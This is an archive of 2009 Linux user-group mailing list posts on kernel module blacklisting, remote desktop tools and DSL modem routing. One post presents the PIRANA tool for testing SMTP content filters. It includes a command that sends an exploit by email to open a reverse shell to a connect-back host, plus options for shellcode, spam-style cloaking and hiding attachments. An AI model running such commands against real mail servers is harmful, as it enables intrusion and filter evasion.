Re: Question About Module Loading
Normally blacklist mods that I don't like in /etc/modules.d/blacklist.* files. On Fri, Dec 25, 2009 at 12:53 AM, Craig White wrote: > On Thu, 2009-12-24 at 22:30 -0700, Mark Phillips wrote: > > I just installed Debian stable (2.6-amd64 kernel) on a machine. I had > > to remove the kernel module for the Ethernet card and add a different > > one. The new module compiled etc and works. However, I had a problem > > preventing the old module from loading. There was no modprobe.conf > > file, but instead a directory modprobe.d with a lot of files in it. > > However, I could not find the expected alias line with the bad > > module's name. I finally googled a solution, and I am curious if this > > is the new way to disabling a kernel module: > > I created a file in /etc/modprobe.d/ called 00local. That file has one > > line: install r8169 /bin/true. This prevented the module r8169 from > > being loaded. I grepped all of /etc/ looking for r8169 and could not > > find where it was being loaded. I am so confused > > > > G'night and Happy Holidays to everyone! > > /lib/modules/_ YOUR_KERNEL _/kernel/drivers/net/r8169.ko > > Craig > > > -- > This message has been scanned for viruses and > dangerous content by MailScanner, and is > believed to be clean. > > --- > PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us > To subscribe, unsubscribe, or to change your mail settings: > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss > -- James McPhee jmc...@gmail.com --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
Re: Question About Module Loading
On Thu, 2009-12-24 at 22:30 -0700, Mark Phillips wrote: > I just installed Debian stable (2.6-amd64 kernel) on a machine. I had > to remove the kernel module for the Ethernet card and add a different > one. The new module compiled etc and works. However, I had a problem > preventing the old module from loading. There was no modprobe.conf > file, but instead a directory modprobe.d with a lot of files in it. > However, I could not find the expected alias line with the bad > module's name. I finally googled a solution, and I am curious if this > is the new way to disabling a kernel module: > I created a file in /etc/modprobe.d/ called 00local. That file has one > line: install r8169 /bin/true. This prevented the module r8169 from > being loaded. I grepped all of /etc/ looking for r8169 and could not > find where it was being loaded. I am so confused > > G'night and Happy Holidays to everyone! /lib/modules/_ YOUR_KERNEL _/kernel/drivers/net/r8169.ko Craig -- This message has been scanned for viruses and dangerous content by MailScanner, and is believed to be clean. --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
Question About Module Loading
I just installed Debian stable (2.6-amd64 kernel) on a machine. I had to remove the kernel module for the Ethernet card and add a different one. The new module compiled etc and works. However, I had a problem preventing the old module from loading. There was no modprobe.conf file, but instead a directory modprobe.d with a lot of files in it. However, I could not find the expected alias line with the bad module's name. I finally googled a solution, and I am curious if this is the new way to disabling a kernel module: I created a file in /etc/modprobe.d/ called 00local. That file has one line: install r8169 /bin/true. This prevented the module r8169 from being loaded. I grepped all of /etc/ looking for r8169 and could not find where it was being loaded. I am so confused G'night and Happy Holidays to everyone! Mark --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
HackFest Series: Pirana Email Holiday Greetings
Pirana PIRANA is a penetration testing framework to help in checking a SMTP content filter's security. It works by attaching an exploit to an email, optionally disguising it from content filters. PIRANA also lets you choose from different type of shellcodes to use and has various options to be stealthy. http://www.guay-leroux.com/projects/SMTP%20content%20filters.pdf http://backtrack.offensive-security.com/index.php/Tools#Pirana Posted Last Year at Xmas to PLUG Archives from Backtrack2 (obfuscated without full links or correct pirana.pl spelling): http://www.mail-archive.com/plug-discuss@lists.plug.phoenix.az.us/msg08695.html The Bt2 HowTo: http://www.linuxhaxor.net/?p=337 Solutions to protect include clamav/spamassassin but this could depend on your spamassassin and other installation specifics. Pirana.pl example: Connect back with a reverse shell just by sending an email using cloaking. $ pirana.pl -e 4 -c 1 -l mynewshellhost -h mail.mydomain.com -a [EMAIL PROTECTED] Usage: pirana.pl [MANDATORY ARGS] [OPTIONAL ARGS] Mandatory arguments: -e+ Exploit number to use (See below) -h+ SMTP server to test -a+ Destination email address used in probing Optional arguments: -s+ Shellcode type to inject into exploits (See below) -c+ Cloaking style (See below) -d+ Try to vanish attachments from MUA's view (See below) -vAttach EICAR virus to improve stealthness -zPack all the malware into a tarball to be less noisy -p+ Port to use in reverse shell or bind shell -l+ Host to connect back in reverse shell mode Valid exploits numbers: 0OSVDB #5753:LHA get_header File Name Overflow 1OSVDB #5754:LHA get_header Directory Name Overflow 2OSVDB #6456:file readelf.c tryelf() ELF Header Overflow 3OSVDB #11695: unarj Filename Handling Overflow 4OSVDB #23460: ZOO combine File and Dir name overflow 5OSVDB #15867: Convert UUlib uunconc integer overflow 6OSVDB #XXX: ZOO next offset infinite loop DoS Valid shellcode types: 0TCP reverse shell 1UDP reverse shell 2TCP bind shell Valid cloaking styles (consult whitepaper for visual result): 0No cloaking at all (default) 1Viagra spam message 2"Look at the pictures I promised you!" Vanishing techniques for attachments: 0No vanishing at all (default) 1Multipart/alternative trick 2 trick Test Test Test! Merry merry merry! -- Skype: (623)239-3392 AT&T: (503)754-4452 http://uncyclopedia.wikia.com/wiki/Santa --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
Re: Logmein beta for linux clients
On 12/24/09, Eric Shubert wrote: > Stephen wrote: >> https://secure.logmein.com/US/labs/ for those of you who have been >> waiting for this... >> >> now all they need is a Linux installation to control Linux machines. >> > > You can do this with an IPCop firewall and OpenVPN, no? > (and it's Free!) :) No, not exactly. Logmein contols a desktop through a RDP type browser plugin and allows a remote support representative to follow all your actions. The closest thing is a vnc connection, or a RDP client, but it is still not truely browser based. There are applications like BEef, which are exploits that allow control of systems through a browser using javascript, but it's still not comparable really to logmein, which is very similar to a Live Person cookie/application. Kaseya agents DO WORK just like this for Linux, OS X and Novell as well as Citrix/Microsoft, but it's pricey! > -- > -Eric 'shubes' > > --- > PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us > To subscribe, unsubscribe, or to change your mail settings: > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss > -- Skype: (623)239-3392 AT&T: (503)754-4452 www.it-clowns.com Only the dead have seen the end of war. -Plato --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
Re: Logmein beta for linux clients
well nevermind then. On Thu, Dec 24, 2009 at 11:15 AM, Eric Shubert wrote: > If you use OpenVPN, you simply open a tunnel to the firewall, and it's > as if you just plugged into the local lan on the other side. Works > from/to any platform. > > I don't see what logmein gains you. What functionality? What open port? > Why use logmein? > > Stephen wrote: >> yeah, sort of. but i don't get anywhere near the same functionality >> and it still means an open port. logmein uses nat to a central service >> so the firewall at home is not really open. >> >> and its an fton easier and works well with windows and mac systems as well. >> >> On Thu, Dec 24, 2009 at 9:52 AM, Eric Shubert wrote: >>> Stephen wrote: https://secure.logmein.com/US/labs/ for those of you who have been waiting for this... now all they need is a Linux installation to control Linux machines. >>> You can do this with an IPCop firewall and OpenVPN, no? >>> (and it's Free!) :) >>> >>> -- >>> -Eric 'shubes' >>> >>> --- >>> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us >>> To subscribe, unsubscribe, or to change your mail settings: >>> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss >>> >> >> >> > > > -- > -Eric 'shubes' > > --- > PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us > To subscribe, unsubscribe, or to change your mail settings: > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss > -- A mouse trap, placed on top of your alarm clock, will prevent you from rolling over and going back to sleep after you hit the snooze button. Stephen --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
Re: Logmein beta for linux clients
If you use OpenVPN, you simply open a tunnel to the firewall, and it's as if you just plugged into the local lan on the other side. Works from/to any platform. I don't see what logmein gains you. What functionality? What open port? Why use logmein? Stephen wrote: > yeah, sort of. but i don't get anywhere near the same functionality > and it still means an open port. logmein uses nat to a central service > so the firewall at home is not really open. > > and its an fton easier and works well with windows and mac systems as well. > > On Thu, Dec 24, 2009 at 9:52 AM, Eric Shubert wrote: >> Stephen wrote: >>> https://secure.logmein.com/US/labs/ for those of you who have been >>> waiting for this... >>> >>> now all they need is a Linux installation to control Linux machines. >>> >> You can do this with an IPCop firewall and OpenVPN, no? >> (and it's Free!) :) >> >> -- >> -Eric 'shubes' >> >> --- >> PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us >> To subscribe, unsubscribe, or to change your mail settings: >> http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss >> > > > -- -Eric 'shubes' --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
Re: Logmein beta for linux clients
yeah, sort of. but i don't get anywhere near the same functionality and it still means an open port. logmein uses nat to a central service so the firewall at home is not really open. and its an fton easier and works well with windows and mac systems as well. On Thu, Dec 24, 2009 at 9:52 AM, Eric Shubert wrote: > Stephen wrote: >> https://secure.logmein.com/US/labs/ for those of you who have been >> waiting for this... >> >> now all they need is a Linux installation to control Linux machines. >> > > You can do this with an IPCop firewall and OpenVPN, no? > (and it's Free!) :) > > -- > -Eric 'shubes' > > --- > PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us > To subscribe, unsubscribe, or to change your mail settings: > http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss > -- A mouse trap, placed on top of your alarm clock, will prevent you from rolling over and going back to sleep after you hit the snooze button. Stephen --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
Re: Logmein beta for linux clients
Stephen wrote: > https://secure.logmein.com/US/labs/ for those of you who have been > waiting for this... > > now all they need is a Linux installation to control Linux machines. > You can do this with an IPCop firewall and OpenVPN, no? (and it's Free!) :) -- -Eric 'shubes' --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss
Re: network woes
Craig White wrote: > On Wed, 2009-12-23 at 14:06 -0700, Dazed_75 wrote: >> Honestly, I've never seen a cable/dsl modem that acts as a DHCP server >> or NAT translator. They normally are only connected to one computer >> or router and just pass the IP/DNS info to the computer or router. >> All routers I have ever dealt with DO act as DHCP servers and usually >> provide NAT. > > every dsl modem that I've seen coming from Qwest the past 5 years is a > combination modem/router and that includes the awful 2-wire things they > try to pawn off on people (which means they do provide DHCP & NAT). They > also include wireless. > > Craig > > Every Qwest DSL modem I've seen (7+ years) contains a router (dhcp, nat). Even models w/out a switch (multiple connections) provide dhcp/nat on the back end. I currently have an Actiontec M1000 (a fairly new model) with one lan connection, but it still does dhcp and nat. These DSL modems can be configured to operate in bridged mode (defeating the dhcp/nat features), but that's not typical. Cable modems, on the other hand, don't typically have router functionality. I haven't had much experience with cable modems lately, but all the ones I've seen (still?) have no router features. They simply give the public IP address to the device (computer or router) that's attached to them. Some newer models might have routers in them, but I wouldn't know. Trent's situation is DSL, not cable. ;) -- -Eric 'shubes' --- PLUG-discuss mailing list - PLUG-discuss@lists.plug.phoenix.az.us To subscribe, unsubscribe, or to change your mail settings: http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss